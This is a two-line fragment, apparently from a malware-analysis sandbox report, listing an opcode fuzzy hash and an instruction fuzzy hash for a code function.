                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64